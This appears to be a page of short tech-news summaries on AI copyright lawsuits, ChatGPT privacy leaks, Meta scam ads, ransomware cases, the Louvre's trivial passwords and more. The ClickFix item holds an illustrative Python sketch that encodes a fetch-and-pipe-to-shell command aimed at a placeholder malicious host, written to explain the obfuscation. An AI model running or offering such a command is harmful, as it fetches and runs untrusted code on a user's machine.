The Courts

OpenAI Fights Order To Turn Over Millions of ChatGPT Conversations (reuters.com) 69

An anonymous reader quotes a report from Reuters: OpenAI asked a federal judge in New York on Wednesday to reverse an order that required it to turn over 20 million anonymized ChatGPT chat logs amid a copyright infringement lawsuit by the New York Times and other news outlets, saying it would expose users' private conversations. The artificial intelligence company argued that turning over the logs would disclose confidential user information and that "99.99%" of the transcripts have nothing to do with the copyright infringement allegations in the case.

"To be clear: anyone in the world who has used ChatGPT in the past three years must now face the possibility that their personal conversations will be handed over to The Times to sift through at will in a speculative fishing expedition," the company said in a court filing (PDF). The news outlets argued that the logs were necessary to determine whether ChatGPT reproduced their copyrighted content and to rebut OpenAI's assertion that they "hacked" the chatbot's responses to manufacture evidence. The lawsuit claims OpenAI misused their articles to train ChatGPT to respond to user prompts.

Magistrate Judge Ona Wang said in her order to produce the chats that users' privacy would be protected by the company's "exhaustive de-identification" and other safeguards. OpenAI has a Friday deadline to produce the transcripts.

Piracy

Amazon Steps Up Attempts To Block Illegal Sports Streaming Via Fire TV Sticks (nytimes.com) 27

Amazon is rolling out a tougher approach to combat illegal streaming, with the United States-based tech company aiming to block apps loaded onto all its Fire TV Stick devices that are identified as providing pirated content. From a report: Exclusive data provided to The Athletic from researchers YouGov Sport highlighted that approximately 4.7 million UK adults watched illegal streams in the UK over the past six months, with 31% using Fire Stick (this has become a catch-all term for plug-in devices, even if not made by Amazon) and other IPTV (Internet Protocol Television) devices. It is now the second-most popular method behind websites (42%).

Amazon launched a new Fire TV Stick last month -- the 4K Select, which is plugged into a TV to facilitate streaming via the internet -- that it insists will be less of a breeding ground for piracy. It includes enhanced security measures via a new Vega operating system, and customers will only be able to download apps available in Amazon's app store. Amazon insists the clampdown will apply to new and old devices alike, but registered developers will still be able to use Fire Sticks for legitimate purposes.

Security

ClickFix May Be the Biggest Security Threat Your Family Has Never Heard Of (arstechnica.com) 79

An anonymous reader quotes a report from Ars Technica: ClickFix often starts with an email sent from a hotel that the target has a pending registration with and references the correct registration information. In other cases, ClickFix attacks begin with a WhatsApp message. In still other cases, the user receives the URL at the top of Google results for a search query. Once the mark accesses the malicious site referenced, it presents a CAPTCHA challenge or other pretext requiring user confirmation. The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter. Once entered, the string of text causes the PC or Mac to surreptitiously visit a scammer-controlled server and download malware. Then, the machine automatically installs it -- all with no indication to the target. With that, users are infected, usually with credential-stealing malware. Security firms say ClickFix campaigns have run rampant. The lack of awareness of the technique, combined with the links also coming from known addresses or in search results, and the ability to bypass some endpoint protections are all factors driving the growth.

The commands, which are often base-64 encoded to make them unreadable to humans, are often copied inside the browser sandbox, a part of most browsers that accesses the Internet in an isolated environment designed to protect devices from malware or harmful scripts. Many security tools are unable to observe and flag these actions as potentially malicious. The attacks can also be effective given the lack of awareness. Many people have learned over the years to be suspicious of links in emails or messengers. In many users' minds, the precaution doesn't extend to sites that instruct them to copy a piece of text and paste it into an unfamiliar window. When the instructions come in emails from a known hotel or at the top of Google results, targets can be further caught off guard. With many families gathering in the coming weeks for various holiday dinners, ClickFix scams are worth mentioning to those family members who ask for security advice. Microsoft Defender and other endpoint protection programs offer some defenses against these attacks, but they can, in some cases, be bypassed. That means that, for now, awareness is the best countermeasure.
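The obfuscation step described above can be illustrated with a short Python sketch. This is a hedged, hypothetical example of the general technique, not an actual ClickFix payload: the command string and URL below are invented placeholders.

```python
import base64

# Hypothetical attacker-style one-liner (placeholder URL, not a real payload):
command = "curl -fsSL https://malicious.example/payload.sh | sh"

# Base-64 encoding turns it into an opaque string -- this is all the victim
# (or a casual observer of the clipboard) sees before pasting it:
encoded = base64.b64encode(command.encode()).decode()
print(encoded)

# The shell on the victim's machine decodes and runs it; decoding recovers
# the original command exactly, so nothing is lost in the round trip:
decoded = base64.b64decode(encoded).decode()
print(decoded == command)
```

The point of the sketch is that the readable command never appears in the encoded string, which is why instructions to "copy this text and paste it into a terminal" defeat users who have learned only to distrust suspicious-looking links.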
Researchers from CrowdStrike described in a report a campaign designed to infect Macs with a Mach-O executable. "Promoting false malicious websites encourages more site traffic, which will lead to more potential victims," wrote the researchers. "The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim's machine while bypassing Gatekeeper checks."

Push Security, meanwhile, reported a ClickFix campaign that uses a device-adaptive page that serves different malicious payloads depending on whether the visitor is on Windows or macOS.
The Courts

OpenAI Used Song Lyrics In Violation of Copyright Laws, German Court Says (reuters.com) 66

A Munich court ruled that OpenAI violated German copyright law by training its models on lyrics from nine songs and allowing ChatGPT to reproduce them. OpenAI now faces damages as it considers an appeal. Reuters reports: The regional court in Munich found that the company trained its AI on protected content from nine German songs, including musician Herbert Groenemeyer's hits "Maenner" and "Bochum." The case was brought by German music rights society GEMA, whose members include composers, lyricists and publishers, in another sign of artists around the world fighting back against data scraping by AI.

Presiding judge Elke Schwager ordered OpenAI to pay damages for the use of copyrighted material, without disclosing a figure. GEMA legal advisor Kai Welp said GEMA hoped discussions could now take place with OpenAI on how copyright holders can be remunerated. OpenAI had argued that its language models did not store or copy specific training data but, rather, reflected what they had learned based on the entire training data set.

Since the output would only be generated as a result of user inputs known as prompts, it was not the defendants, but the respective user who would be liable for it, OpenAI had argued. However, the court found that both the memorization in the language models and the reproduction of the song lyrics in the chatbot's outputs constitute infringements of copyright exploitation rights, according to a statement on the ruling.

United States

US Senator Challenges Defense Industry on Right-to-Repair Opposition (reuters.com) 47

Democratic U.S. Senator Elizabeth Warren is escalating pressure on the defense industry to stop opposing military right-to-repair legislation, as House and Senate negotiators work to finalize the fiscal 2026 National Defense Authorization Act. From a report: In a sharply worded November 5 letter to the National Defense Industrial Association (NDIA) obtained by Reuters, Warren accused the industry group of attempting to undermine bipartisan efforts to give the Pentagon greater ability to repair weapons and equipment it owns.

She called the group's opposition "a dangerous and misguided attempt to protect an unacceptable status quo of giant contractor profiteering." Currently, the government is often required to pay contractors like NDIA members Lockheed Martin, Boeing and RTX to use expensive original equipment and installers to service broken parts, rather than having trained military maintainers 3D-print spares in the field and install them faster and more cheaply.

Security

A Jailed Hacking Kingpin Reveals All About Cybercrime Gang (bbc.com) 19

Slashdot reader alternative_right shares an exclusive BBC interview with Vyacheslav "Tank" Penchukov, once a top-tier cyber-crime boss behind Jabber Zeus, IcedID, and major ransomware campaigns. His story traces the evolution of modern cybercrime from early bank-theft malware to today's lucrative ransomware ecosystem, marked by shifting alliances, Russian security-service ties, and the paranoia that ultimately consumes career hackers. Here's an excerpt from the report: In the late 2000s, he and the infamous Jabber Zeus crew used revolutionary cyber-crime tech to steal directly from the bank accounts of small businesses, local authorities and even charities. Victims saw their savings wiped out and balance sheets upended. In the UK alone, there were more than 600 victims, who lost more than $5.2 million in just three months. Between 2018 and 2022, Penchukov set his sights higher, joining the thriving ransomware ecosystem with gangs that targeted international corporations and even a hospital. [...]

Penchukov says he did not think about the victims, and he does not seem to do so much now, either. The only sign of remorse in our conversation was when he talked about a ransomware attack on a disabled children's charity. His only real regret seems to be that he became too trusting with his fellow hackers, which ultimately led to him and many other criminals being caught. "You can't make friends in cyber-crime, because the next day, your friends will be arrested and they will become an informant," he says. "Paranoia is a constant friend of hackers," he says. But success leads to mistakes. "If you do cyber-crime long enough you lose your edge," he says, wistfully.

EU

Critics Call Proposed Changes To Landmark EU Privacy Law 'Death By a Thousand Cuts' (reuters.com) 27

An anonymous reader quotes a report from Reuters: Privacy activists say proposed changes to Europe's landmark privacy law, including making it easier for Big Tech to harvest Europeans' personal data for AI training, would flout EU case law and gut the legislation. The changes proposed by the European Commission are part of a drive to simplify a slew of laws adopted in recent years on technology, environmental and financial issues which have in turn faced pushback from companies and the U.S. government.

EU tech chief Henna Virkkunen will present the Digital Omnibus, in effect proposals to cut red tape and overlapping legislation such as the General Data Protection Regulation, the Artificial Intelligence Act, the e-Privacy Directive and the Data Act, on November 19. According to the plans, Google, Meta Platforms, OpenAI and other tech companies may be allowed to use Europeans' personal data to train their AI models based on legitimate interest.

In addition, companies may be exempted from the ban on processing special categories of personal data "in order not to disproportionately hinder the development and operation of AI and taking into account the capabilities of the controller to identify and remove special categories of personal data." [...] The proposals would need to be thrashed out with EU countries and European Parliament in the coming months before they can be implemented.
"The draft Digital Omnibus proposes countless changes to many different articles of the GDPR. In combination this amounts to a death by a thousand cuts," Austrian privacy group noyb said in a statement. "This would be a massive downgrading of Europeans' privacy 10 years after the GDPR was adopted," noyb's Max Schrems said.

"These proposals would change how the EU protects what happens inside your phone, computer and connected devices," European Digital Rights policy advisor Itxaso Dominguez de Olazabal wrote in a LinkedIn post. "That means access to your device could rely on legitimate interest or broad exemptions like security, fraud detection or audience measurement," she said.
AI

'AI Slop' in Court Filings: Lawyers Keep Citing Fake AI-Hallucinated Cases (indianexpress.com) 135

"According to court filings and interviews with lawyers and scholars, the legal profession in recent months has increasingly become a hotbed for AI blunders," reports the New York Times: Earlier this year, a lawyer filed a motion in a Texas bankruptcy court that cited a 1985 case called Brasher v. Stewart. Only the case doesn't exist. Artificial intelligence had concocted that citation, along with 31 others. A judge blasted the lawyer in an opinion, referring him to the state bar's disciplinary committee and mandating six hours of A.I. training.

That filing was spotted by Robert Freund, a Los Angeles-based lawyer, who fed it to an online database that tracks legal A.I. misuse globally. Mr. Freund is part of a growing network of lawyers who track down A.I. abuses committed by their peers, collecting the most egregious examples and posting them online. The group hopes that by tracking down the A.I. slop, it can help draw attention to the problem and put an end to it... [C]ourts are starting to map out punishments of small fines and other discipline. The problem, though, keeps getting worse. That's why Damien Charlotin, a lawyer and researcher in France, started an online database in April to track it.

Initially he found three or four examples a month. Now he often receives that many in a day. Many lawyers... have helped him document 509 cases so far. They use legal tools like LexisNexis for notifications on keywords like "artificial intelligence," "fabricated cases" and "nonexistent cases." Some of the filings include fake quotes from real cases, or cite real cases that are irrelevant to their arguments. The legal vigilantes uncover them by finding judges' opinions scolding lawyers...

Court-ordered penalties "are not having a deterrent effect," said Freund, who has publicly flagged more than four dozen examples this year. "The proof is that it continues to happen."

Google

Did ChatGPT Conversations Leak... Into Google Search Console Results? (arstechnica.com) 51

"For months, extremely personal and sensitive ChatGPT conversations have been leaking into an unexpected destination," reports Ars Technica: the search-traffic tool for webmasters , Google Search Console.

Though it normally shows the short phrases or keywords typed into Google that led someone to their site, "starting this September, odd queries, sometimes more than 300 characters long, could also be found" in Google Search Console. And the chats "appeared to be from unwitting people prompting a chatbot to help solve relationship or business problems, who likely expected those conversations would remain private." Jason Packer, owner of analytics consulting firm Quantable, flagged the issue in a detailed blog post last month, telling Ars Technica he'd seen 200 odd queries — including "some pretty crazy ones." (Web optimization consultant Slobodan Manić helped Packer investigate...) Packer points out that nobody clicked "share" or was given an option to prevent their chats from being exposed. Packer suspected that these queries were connected to reporting from The Information in August that cited sources claiming OpenAI was scraping Google search results to power ChatGPT responses. Sources claimed that OpenAI was leaning on Google to answer prompts to ChatGPT seeking information about current events, like news or sports... "Did OpenAI go so fast that they didn't consider the privacy implications of this, or did they just not care?" Packer posited in his blog... Clearly some of those searches relied on Google, Packer's blog said, mistakenly sending to GSC "whatever" the user says in the prompt box... This means "that OpenAI is sharing any prompt that requires a Google Search with both Google and whoever is doing their scraping," Packer alleged. "And then also with whoever's site shows up in the search results! Yikes."

To Packer, it appeared that "ALL ChatGPT prompts" that used Google Search risked being leaked during the past two months. OpenAI claimed only a small number of queries were leaked but declined to provide a more precise estimate. So, it remains unclear how many of the 700 million people who use ChatGPT each week had prompts routed to Google Search Console.

"Perhaps most troubling to some users — whose identities are not linked in chats unless their prompts perhaps share identifying information — there does not seem to be any way to remove the leaked chats from Google Search Console.."
Facebook

Bombshell Report Exposes How Meta Relied On Scam Ad Profits To Fund AI (reuters.com) 59

"Internal documents have revealed that Meta has projected it earns billions from ignoring scam ads that its platforms then targeted to users most likely to click on them," writes Ars Technica, citing a lengthy report from Reuters.

Reuters reports that Meta "for at least three years failed to identify and stop an avalanche of ads that exposed Facebook, Instagram and WhatsApp's billions of users to fraudulent e-commerce and investment schemes, illegal online casinos, and the sale of banned medical products..." On average, one December 2024 document notes, the company shows its platforms' users an estimated 15 billion "higher risk" scam advertisements — those that show clear signs of being fraudulent — every day. Meta earns about $7 billion in annualized revenue from this category of scam ads, another late 2024 document states. Much of the fraud came from marketers acting suspiciously enough to be flagged by Meta's internal warning systems.

But the company only bans advertisers if its automated systems predict the marketers are at least 95% certain to be committing fraud, the documents show. If the company is less certain — but still believes the advertiser is a likely scammer — Meta charges higher ad rates as a penalty, according to the documents. The idea is to dissuade suspect advertisers from placing ads. The documents further note that users who click on scam ads are likely to see more of them because of Meta's ad-personalization system, which tries to deliver ads based on a user's interests... The documents indicate that Meta's own research suggests its products have become a pillar of the global fraud economy. A May 2025 presentation by its safety staff estimated that the company's platforms were involved in a third of all successful scams in the U.S.

Meta also acknowledged in other internal documents that some of its main competitors were doing a better job at weeding out fraud on their platforms... The documents note that Meta plans to try to cut the share of Facebook and Instagram revenue derived from scam ads. In the meantime, Meta has internally acknowledged that regulatory fines for scam ads are certain, and anticipates penalties of up to $1 billion, according to one internal document. But those fines would be much smaller than Meta's revenue from scam ads, a separate document from November 2024 states. Every six months, Meta earns $3.5 billion from just the portion of scam ads that "present higher legal risk," the document says, such as those falsely claiming to represent a consumer brand or public figure or demonstrating other signs of deceit. That figure almost certainly exceeds "the cost of any regulatory settlement involving scam ads...."

A planning document for the first half of 2023 notes that everyone who worked on the team handling advertiser concerns about brand-rights issues had been laid off. The company was also devoting resources so heavily to virtual reality and AI that safety staffers were ordered to restrict their use of Meta's computing resources. They were instructed merely to "keep the lights on...." Meta also was ignoring the vast majority of user reports of scams, a document from 2023 indicates. By that year, safety staffers estimated that Facebook and Instagram users each week were filing about 100,000 valid reports of fraudsters messaging them, the document says. But Meta ignored or incorrectly rejected 96% of them. Meta's safety staff resolved to do better. In the future, the company hoped to dismiss no more than 75% of valid scam reports, according to another 2023 document.

A small advertiser would have to get flagged for promoting financial fraud at least eight times before Meta blocked it, a 2024 document states. Some bigger spenders — known as "High Value Accounts" — could accrue more than 500 strikes without Meta shutting them down, other documents say.

Thanks to long-time Slashdot reader schwit1 for sharing the article.
Privacy

Unesco Adopts Global Standards On 'Wild West' Field of Neurotechnology (theguardian.com) 14

Unesco has adopted the first global ethical standards for neurotechnology, defining "neural data" and outlining more than 100 recommendations aimed at safeguarding mental privacy. "There is no control," said Unesco's chief of bioethics, Dafna Feinholz. "We have to inform the people about the risks, the potential benefits, the alternatives, so that people have the possibility to say 'I accept, or I don't accept.'" The Guardian reports: She said the new standards were driven by two recent developments in neurotechnology: artificial intelligence (AI), which offers vast possibilities in decoding brain data, and the proliferation of consumer-grade neurotech devices such as earbuds that claim to read brain activity and glasses that track eye movements.

The standards define a new category of data, "neural data," and suggest guidelines governing its protection. A list of more than 100 recommendations ranges from rights-based concerns to addressing scenarios that are -- at least for now -- science fiction, such as companies using neurotechnology to subliminally market to people during their dreams.
"Neurotechnology has the potential to define the next frontier of human progress, but it is not without risks," said Unesco's director general, Audrey Azoulay. The new standards would "enshrine the inviolability of the human mind," she said.
The Courts

Texas Sues Roblox For Allegedly Failing To Protect Children On Its Platform (theverge.com) 45

Texas is suing Roblox, alleging the company misled parents about safety, ignored online-protection laws, and allowed an environment where predators could target children. Texas AG Ken Paxton said the online game platform is "putting pixel pedophiles and profits over the safety of Texas children," alleging that it is "flagrantly ignoring state and federal online safety laws while deceiving parents about the dangers of its platform." The Verge reports: The lawsuit's examples focus on instances of children who have been abused by predators they met via Roblox, and the activities of groups like 764 which have used online platforms to identify and blackmail victims into sexually explicit acts or self harm. According to the suit, Roblox's parental controls push only began after a number of lawsuits, and a report released last fall by the short seller Hindenburg that said its "in-game research revealed an X-rated pedophile hellscape, exposing children to grooming, pornography, violent content and extremely abusive speech." Eric Porterfield, Senior Director of Policy Communications at Roblox, said in a statement: "We are disappointed that, rather than working collaboratively with Roblox on this industry-wide challenge and seeking real solutions, the AG has chosen to file a lawsuit based on misrepresentations and sensationalized claims." He added, "We have introduced over 145 safety measures on the platform this year alone."
Social Networks

Denmark's Government Aims To Ban Access To Social Media For Children Under 15 (apnews.com) 35

An anonymous reader quotes a report from the Associated Press: Denmark's government on Friday announced an agreement to ban access to social media for anyone under 15, ratcheting up pressure on Big Tech platforms as concerns grow that kids are getting too swept up in a digitized world of harmful content and commercial interests. The move would give some parents -- after a specific assessment -- the right to let their children access social media from age 13.

It wasn't immediately clear how such a ban would be enforced: Many tech platforms already restrict pre-teens from signing up. Officials and experts say such restrictions don't always work. Such a measure would be among the most sweeping steps yet by a European Union government to limit use of social media among teens and younger children, which has drawn concerns in many parts of an increasingly online world.
"We've given the tech giants so many chances to stand up and to do something about what is happening on their platforms. They haven't done it," said Caroline Stage, Denmark's minister for digital affairs. "So now we will take over the steering wheel and make sure that our children's futures are safe."

"I can assure you that Denmark will hurry, but we won't do it too quickly because we need to make sure that the regulation is right and that there is no loopholes for the tech giants to go through," Stage said.
Security

US Congressional Budget Office Hit By Suspected Foreign Cyberattack (bleepingcomputer.com) 26

An anonymous reader quotes a report from BleepingComputer: The U.S. Congressional Budget Office (CBO) confirms it suffered a cybersecurity incident after a suspected foreign hacker breached its network, potentially exposing sensitive data. In a statement shared with BleepingComputer, CBO spokesperson Caitlin Emma confirmed the "security incident" and said the agency acted quickly to contain it. "The Congressional Budget Office has identified the security incident, has taken immediate action to contain it, and has implemented additional monitoring and new security controls to further protect the agency's systems going forward," Emma told BleepingComputer.

"The incident is being investigated and work for the Congress continues. Like other government agencies and private sector entities, CBO occasionally faces threats to its network and continually monitors to address those threats." The Washington Post first reported the breach, stating that officials discovered the hack in recent days and are now concerned that emails and exchanges between congressional offices and the CBO's analysts may have been exposed. While officials have reported told lawmakers they believe the intrusion was detected early, some congressional office have allegedly halted emails with the CBO out of security concerns.

The Courts

Why Sam Altman Was Booted From OpenAI, According To New Testimony (theverge.com) 38

An anonymous reader quotes a report from The Verge: "What did Ilya see?" Two years ago, it was the meme seen 'round the world (or at least 'round the tech industry). OpenAI CEO Sam Altman had been briefly ousted in November 2023 by members of the company's board of directors, including his longtime collaborator and fellow cofounder Ilya Sutskever. The board claimed Altman "was not consistently candid in his communications with the board," undermining their confidence in him. He was out for less than a week before being reinstated after hundreds of employees threatened to resign. But observers wondered: What hadn't Altman been candid about? And what led Sutskever to turn against him?

Now, new details have come to light in a legal deposition involving Sutskever, part of Elon Musk's ongoing lawsuit against Altman and OpenAI. For nearly 10 hours on October 1st, bookended by repeated sniping between Musk's and Sutskever's attorneys, Sutskever answered questions about the turmoil around Altman's ouster, from conflicts between executives to short-lived merger talks with Anthropic. He testified that from personal experience and documentation he'd viewed, he'd seen Altman pit high-ranking executives against each other and offer conflicting information about his plans for the company, telling people what they wanted to hear.

The testimony paints a picture of a leader who could be manipulative and chameleon-like in the relentless pursuit of his own agenda -- though Sutskever expressed hesitation about his reliance on some of the secondhand accounts later in testimony, saying he "learned the critical importance of firsthand knowledge for matters like this." In a statement to The Verge, OpenAI spokesperson Liz Bourgeois said that "The events of 2023 are behind us. These claims were fully examined during the board's independent review, which unanimously concluded Sam and Greg are the right leaders for OpenAI." The comment echoes a 2024 statement by board chair Bret Taylor, following an investigation conducted by the company.
Altman "exhibits a consistent pattern of lying, undermining his execs, and pitting his execs against one another," reads a quote from the memo Sutskever. Altman told him and Jakub Pachocki, who is now OpenAI's chief scientist, "conflicting things about the way the company would be run," leading to internal conflict and repeated undermining.

Sutskever said he also faulted Altman for "not accepting or rejecting" former OpenAI research executive Dario Amodei's conditions when he wanted to run all research and fire OpenAI president Greg Brockman, implying Altman played both sides.

Furthermore, OpenAI CTO Mira Murati surfaced claims that Altman left Y Combinator for "similar behaviors. He was creating chaos, starting lots of new projects, pitting people against each other, and thus was not managing YC well."
Piracy

Cloudflare Tells US Govt That Foreign Site Blocking Efforts Are Digital Trade Barriers (torrentfreak.com) 12

An anonymous reader quotes a report from TorrentFreak: In a submission for the 2026 National Trade Estimate Report (PDF), Cloudflare warns the U.S. government that site blocking efforts cause widespread disruption to legitimate services. The complaint points to Italy's automated Piracy Shield system, which reportedly blocked "tens of thousands" of legitimate sites. Meanwhile, overbroad IP address blocks in Spain and new automated blocking proposals in France are serious concerns that harm U.S. business interests, Cloudflare reports. [...]

Cloudflare urges the USTR to take these concerns into account for its upcoming National Trade Estimate Report. Ideally, it wants these trade barriers to be dismantled. These calls run counter to requests from rightsholders, who urge the USTR to ensure that more foreign countries implement blocking measures. With potential site-blocking legislation being considered in U.S. Congress, that may impact local lobbying efforts as well. If and how the USTR will address these concerns will become clearer early next year, when the 2026 National Trade Estimate Report is expected to be published.

Privacy

The Louvre's Video Surveillance Password Was 'Louvre' (pcgamer.com) 90

A bungled October 18 heist that saw $102 million of crown jewels stolen from the Louvre in broad daylight has exposed years of lax security at the national art museum. From trivial passwords like 'LOUVRE' to decades-old, unsupported systems and easy rooftop access, the job was made surprisingly easy. PC Gamer reports: As Rogue cofounder and former Polygon arch-jester Cass Marshall notes on Bluesky, we owe a lot of videogame designers an apology. We've spent years dunking on the emptyheadedness of game characters leaving their crucial security codes and vault combinations in the open for anyone to read, all while the Louvre has been using the password "Louvre" for its video surveillance servers. That's not an exaggeration. Confidential documents reviewed by Liberation detail a long history of Louvre security vulnerabilities, dating back to a 2014 cybersecurity audit performed by the French Cybersecurity Agency (ANSSI) at the museum's request. ANSSI experts were able to infiltrate the Louvre's security network to manipulate video surveillance and modify badge access.

"How did the experts manage to infiltrate the network? Primarily due to the weakness of certain passwords which the French National Cybersecurity Agency (ANSSI) politely describes as 'trivial,'" writes Liberation's Brice Le Borgne via machine translation. "Type 'LOUVRE' to access a server managing the museum's video surveillance, or 'THALES' to access one of the software programs published by... Thales." The museum sought another audit from France's National Institute for Advanced Studies in Security and Justice in 2015. Concluded two years later, the audit's 40 pages of recommendations described "serious shortcomings," "poorly managed" visitor flow, rooftops that are easily accessible during construction work, and outdated and malfunctioning security systems. Later documents indicate that, in 2025, the Louvre was still using security software purchased in 2003 that is no longer supported by its developer, running on hardware using Windows Server 2003.

Piracy

Google Removed 749 Million Anna's Archive URLs From Its Search Results (torrentfreak.com) 38

Google has delisted over 749 million URLs from Anna's Archive, a shadow library and meta-search engine for pirated books, representing 5% of all copyright takedown requests ever filed with the company. TorrentFreak reports: Google's transparency report reveals that rightsholders asked Google to remove 784 million URLs, divided over the three main Anna's Archive domains. A small number were rejected, mainly because Google didn't index the reported links, resulting in 749 million confirmed removals. The comparison to sites such as The Pirate Bay isn't fair, as Anna's Archive has many more pages in its archive and uses multiple country-specific subdomains. This means that there's simply more content to take down. That said, in terms of takedown activity, the site's three domain names clearly dwarf all pirate competition.

Since Google published its first transparency report in May 2012, rightsholders have flagged 15.1 billion allegedly infringing URLs. That's a staggering number, but the fact that 5% of the total targeted Anna's Archive URLs is remarkable. Penguin Random House and John Wiley & Sons are the most active publishers targeting the site, but they are certainly not alone. According to Google data, more than 1,000 authors or publishers have sent DMCA notices targeting Anna's Archive domains. Yet, there appears to be no end in sight. Rightsholders are reporting roughly 10 million new URLs per week for the popular piracy library, so there is no shortage of content to report.

Privacy

Data Breach At Major Swedish Software Supplier Impacts 1.5 Million (bleepingcomputer.com) 6

A massive cyberattack on Swedish IT supplier Miljodata exposed personal data from up to 1.5 million citizens, prompting a national privacy investigation and scrutiny into security failures across multiple municipalities. BleepingComputer reports: Miljodata is an IT systems supplier for roughly 80% of Sweden's municipalities. The company disclosed the incident on August 25, saying that the attackers stole data and demanded 1.5 Bitcoin to not leak it. The attack caused operational disruptions that affected citizens in multiple regions in the country, including Halland, Gotland, Skelleftea, Kalmar, Karlstad, and Monsteras.

Because of the large impact, the state monitored the situation from the time of disclosure, with CERT-SE and the police starting to investigate immediately. According to IMY, the attacker exposed on the dark web data that corresponds to 1.5 million people in the country, creating the basis for investigating potential General Data Protection Regulation (GDPR) violations. [...] Although no ransomware groups had claimed the attack when Miljodata disclosed the incident, BleepingComputer found that the threat group Datacarry posted the stolen data on its dark web portal on September 13.
The leaked database, which contains information such as names, email addresses, physical addresses, phone numbers, government IDs, and dates of birth, has been added to Have I Been Pwned.

Crime

Ex-Cybersecurity Staff Charged With Moonlighting as Hackers (msn.com) 10

Three employees at cybersecurity companies spent years moonlighting as criminal hackers, launching their own ransomware attacks in a plot to extort millions of dollars from victims around the country, US prosecutors alleged in court filings. From a report: Ryan Clifford Goldberg, a former incident response supervisor at Sygnia Consulting, and Kevin Tyler Martin, who was a ransomware negotiator for DigitalMint, were charged with working together to hack five businesses starting in May 2023. In one instance, they, along with a third person, received a ransom payment of nearly $1.3 million worth of cryptocurrency from a medical device company based in Tampa, Florida, according to prosecutors.

The trio worked in a part of the cybersecurity industry that has sprung up to help companies negotiate with hackers to unfreeze their computer networks -- sometimes by paying ransom. They are also accused of sharing their illicit profits with the developers of the type of ransomware they allegedly used on their victims. DigitalMint informed some customers about the charges last week, according to a document seen by Bloomberg News.

The other person who was allegedly involved in the scheme was also a ransomware negotiator at the same firm as Martin but wasn't charged, according to court records. The person wasn't identified in court records, nor were the companies that were the defendants' former employers. Sygnia confirmed Goldberg had worked there. Martin last year gave a talk at a law school, which listed him as an employee of DigitalMint.

Crime

DOJ Accuses US Ransomware Negotiators of Launching Their Own Ransomware Attacks (techcrunch.com) 20

An anonymous reader quotes a report from TechCrunch: U.S. prosecutors have charged two rogue employees of a cybersecurity company that specializes in negotiating ransom payments to hackers on behalf of their victims with carrying out ransomware attacks of their own. Last month, the Department of Justice indicted Kevin Tyler Martin and another unnamed employee, who both worked as ransomware negotiators at DigitalMint, with three counts of computer hacking and extortion related to a series of attempted ransomware attacks against at least five U.S.-based companies.

Prosecutors also charged a third individual, Ryan Clifford Goldberg, a former incident response manager at cybersecurity giant Sygnia, as part of the scheme. The three are accused of hacking into companies, stealing their sensitive data, and deploying ransomware developed by the ALPHV/BlackCat group. [...] According to an FBI affidavit filed in September, the rogue employees received more than $1.2 million in ransom payments from one victim, a medical device maker in Florida. They also targeted several other companies, including a Virginia-based drone maker and a Maryland-headquartered pharmaceutical company.

Australia

Australians To Get At Least Three Hours a Day of Free Solar Power - Even If They Don't Have Solar Panels (theguardian.com) 62

Australia's new "solar sharer" program will give households in NSW, south-east Queensland, and South Australia at least three hours of free solar power each day starting in 2026 -- even for those without rooftop panels. Other areas will potentially follow in 2027. The Guardian reports: The government said Australians could schedule appliances such as washing machines, dishwashers and air conditioners and charge electric vehicles and household batteries during this time. The solar sharer scheme would be implemented through a change to the default market offer that sets the maximum price retailers can charge customers for electricity in parts of the country. The climate change and energy minister, Chris Bowen, said the program would ensure "every last ray of sunshine was powering our homes" instead of some solar energy being wasted.

Australians have installed more than 4m solar systems and there is regularly cheap excess generation in the middle of the day. Part of the rationale for the program is that it could shift demand for electricity from peak times -- particularly early in the evening -- to when it is sunniest. This could help minimize peak electricity prices and reduce the need for network upgrades and interventions to keep the power grid stable.

The Courts

Spotify Sued Over 'Billions' of Fraudulent Drake Streams (consequence.net) 32

A new class-action lawsuit accuses Spotify of allowing billions of fraudulent Drake streams generated by bots between 2022 and 2025, allegedly inflating his royalties at the expense of other artists. "Spotify pays streaming royalties using a 'pro-rata' model based on an artist's market share," notes Consequence. "Each month, revenue from subscriptions and ads is collected into a single, fixed 'pot' of money, which is then distributed to rights holders based on their percentage of the platform's total streams. Because this pot is fixed, an artist who artificially inflates their numbers through bots would dilute the value of every legitimate stream. This allows them to take a larger share of the pot than they earned, effectively siphoning royalties that should have gone to other artists." From the report: According to Rolling Stone, the lawsuit alleges bot use is a widespread problem on Spotify. However, Drake is the only example named, based on "voluminous information" which the company "knows or should know" that proves a "substantial, non-trivial percentage" of his approximately 37 billion streams were "inauthentic and appeared to be the work of a sprawling network of Bot Accounts."
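The dilution mechanic described above follows directly from the arithmetic of a fixed pot. A minimal sketch, with entirely hypothetical artists, stream counts, and pot size, shows how bot streams credited to one artist cut every other artist's payout:

```python
# Illustrative sketch of a pro-rata streaming royalty pool.
# All numbers are hypothetical. Because the monthly revenue "pot" is fixed,
# inflating one artist's stream count dilutes every legitimate stream.

def pro_rata_payouts(pot: float, streams: dict[str, int]) -> dict[str, float]:
    """Split a fixed revenue pot by each artist's share of total streams."""
    total = sum(streams.values())
    return {artist: pot * count / total for artist, count in streams.items()}

pot = 1_000_000.0  # fixed monthly pot, in dollars

honest = {"Artist A": 600_000, "Artist B": 400_000}
# Same legitimate listening, plus 1,000,000 bot streams credited to Artist A.
botted = {"Artist A": 1_600_000, "Artist B": 400_000}

before = pro_rata_payouts(pot, honest)
after = pro_rata_payouts(pot, botted)

print(before["Artist B"])  # 400000.0
print(after["Artist B"])   # 200000.0 -- halved, though B's real streams never changed
```

Artist B's real listening never changes, yet their payout is halved, which is the "siphoning" the complaint alleges.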

The complaint claims this alleged fraudulent activity took place between "January 2022 and September 2025," with an examination of "abnormal VPN usage" revealing at least 250,000 streams of Drake's song "No Face" during a four-day period in 2024 were actually from Turkey "but were falsely geomapped through the coordinated use of VPNs to the United Kingdom in [an] attempt to obscure their origins." Other notable allegations in the lawsuit are that "a large percentage" of accounts were concentrated in areas where the population could not support such a high volume of streams, including those with "zero residential addresses." The suit also points to "significant and irregular uptick months" for Drake's songs long after their release, as well as a "slower and less dramatic" downtick in streams compared to other artists.

Noting a "staggering and irregular" streaming of Drake's music by individuals, the suit also claims there are a "massive amount of accounts" listening to his songs "23 hours a day." Less than 2% of those users account for "roughly 15 percent" of his streams. "Drake's music accumulated far higher total streams compared to other highly streamed artists, even though those artists had far more 'users' than Drake," the lawsuit concludes.

Google

Google Removes Gemma Models From AI Studio After GOP Senator's Complaint (arstechnica.com) 49

